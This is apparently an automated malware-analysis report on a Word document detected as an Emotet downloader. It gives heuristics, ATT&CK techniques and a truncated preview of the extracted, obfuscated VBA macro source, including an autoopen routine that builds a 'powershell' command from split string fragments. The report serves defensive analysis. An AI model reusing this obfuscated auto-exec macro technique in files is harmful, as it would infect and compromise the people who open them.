MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the VBA macro attempts to execute processes using WMI. The presence of an AutoOpen macro and the ClamAV detection for 'Doc.Downloader.Emotet-6888558-0' strongly suggest Emotet family activity. The VBA script, although heavily obfuscated, likely facilitates the download and execution of a secondary payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6888558-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6888558-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60436 bytes |
SHA-256: 4a3809d36c9b357a8cdf02ee9c86d6a1d5bd62c0fdfbb065b9c6a31218bf2e0d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KCDAB1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YAoAcUA()
Set fkXABw = wXAkAUQA
If qAABkAGA = NQC1XcA Then
rA1xDAx = CBool(331546950 - Round(CDQUAAAQ) * UDQ_AU * 199427170)
zXGBAB_ = Chr(M4D_ADU)
TAGkX1A = CDate(72203852 * 754263603)
sUAQcAQD = Oct(qAkAQAA - Round(jAcwADGB))
End If
Set GAADxAo = iBDCUBD
If w4AoQX = dBoXCoQA Then
pUxCGQ = CLng(962720796 - CDbl(tAGDAB) * jAABAQAB * 295043834)
lGQAA4B = CInt(BABAxo)
uZA44AB = Tan(326015531 * 99565947)
fGDUDQx = CDate(b4ZXAXA - Sin(RQDDcUAB))
End If
Set TAU_AZAA = IDADQBX
If qQAA1AGA = IDx4AxA Then
kDDUBDBQ = CInt(524473724 - ChrW(GADxAAD) * JAABAU1 * 152642215)
DUUAAAAA = CInt(Y_AAAA)
zGAAkABA = Rnd(668889659 * 239035900)
pU1AA4 = Int(lDXDUU - CByte(aDAAB1AA))
End If
Set wox4AG1A = bDAABD
If w_UACZ = ocUw_UU Then
FABAxDc = ChrW(274826799 - Chr(CwAGCCk_) * KCQAAA1 * 238332441)
HADAZCAA = ChrB(V_AGAD)
XAACAX = Log(402121482 * 156006925)
WkAADxUU = Round(JcABQG - CByte(ooAcXcQG))
End If
Set iCxUDo = VQ_QUUAZ
If j4UAAkA = LAAAGw Then
vCQAoGU = Rnd(197039317 - CSng(ZQU4AGZ) * P4XoDUQA * 86388918)
pAxADBAA = Cos(BBAUAXU4)
G_AAAUA_ = ChrB(240485264 * 91840547)
WXAAQDA = Chr(kAc1ABXC - Sin(H1AQAx))
End If
Set iXXxxGGU = MGcUADcA
If UBAcAQDw = ZcwQDAAA Then
B1QAABxB = Int(784761315 - CBool(s1ZADAw) * fAADAw_ * 205667607)
JAAQQkQA = Int(bAABwAU)
zQCG4k4 = Rnd(137375139 * 430664323)
TAQAQAAQ = CStr(QwkACD - CByte(GAQAQA))
End If
Set aQABAAB = jZAcU_Q
If kAD_AkAQ = Zo_BCo Then
lckAAAQ = Chr(560795357 - Log(CUQDAA) * QADZ1DQ * 784928056)
KCDDcBA = ChrB(pAGCoxCA)
V4BABBD = Round(246508817 * 216385499)
TGAoDXwC = Tan(NQQABAk_ - Fix(h_ADxA))
End If
End Function
Sub autoopen()
On Error Resume Next
Set RAAAXA4D = SCkAwGAc
If GcZZxwU = IXAxBXB Then
NAAAU4GU = Tan(836694526 - Round(uGXwB4) * qACXDA * 638859433)
z1AAoAU = ChrB(k1ABAUxD)
AB_wAAC = Hex(565900788 * 305512387)
jAAkAQc = CDbl(M_4BADAc - Cos(KU1AQcZ))
End If
Set loBQZBU = boUA1wwU
If ODBCwZw = zoBCAUQA Then
SxAkwBDA = Cos(874558623 - Int(UDD1Ako) * C1AAAAU * 925895404)
ZAZAAUwA = Log(G4ADw4Q)
m1AckAA = Fix(582030249 * 237791620)
tAGc1AA = CSng(vXBwQ_ - Cos(DBGAC1Z4))
End If
nw_X4Ak (zoUQAx + "po" + lBoABA + "wershel" + tAUcCBAG + BkA_AXAD + uoAAAUAB + JZAXBD + qXGDXkQ + iw1BUB + IQBG1A + oDAAxA + tADAUAZG)
Set zU1DB1XA = F1AQGU
If RADDCXAB = mABAcAkC Then
QQoAAAk = CDate(287115903 - Atn(X4AAkw) * mDDc1XA * 261735182)
QwUUAA = CInt(uAwwAcG)
H1kAAUQ = Int(213326584 * 317072643)
YUBoAD = CByte(lAAUxBAA - Cos(CkAUAQC))
End If
Set IAGAGCkx = WGx4D1B
If LoAwADXX = MkBAXwkX Then
LQZA_4AA = Fix(505935207 - Cos(OZAwAAZZ) * n_AoABA * 855163222)
GkAQ_UwQ = Int(IGUAC4QA)
jGxXA1 = Int(330729557 * 168683964)
BXA1AA = ChrW(oQUAAUAD - Cos(vAAA4A))
End If
End Sub
Function cDAAAB()
Set WAAAGcA = mUABAwCA
If XAGZG1Q = aokAZCkB Then
GAAB_U1 = Sqr(433732450 - Fix(lxAwCxAQ) * YkcAAk * 619340989)
jGDQQG1k = ChrW(pUBADC)
uQ_1DX = CLng(368504264 * 898157917)
dBADA4_ = Oct(ZoBGAZQ - ChrB(jGAAAoA))
End If
Set cAAAQQ = fAQQQAD
If pAAGDU = hAXAA4 Then
PAAAAAU = CByte(282795031 - Hex(fXBUwQC) * HQBXA14o * 367044481)
jUAA_QA = CInt(JQAAcQA)
wUoBGw = CSng(749044112 * 730934858)
mAAx4wUo = Hex(zUAxUA - ChrB(nwAACAA))
End If
Set vwD1UQ = ZCDAAkAA
If EDAACGQ = d1owUUAQ Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.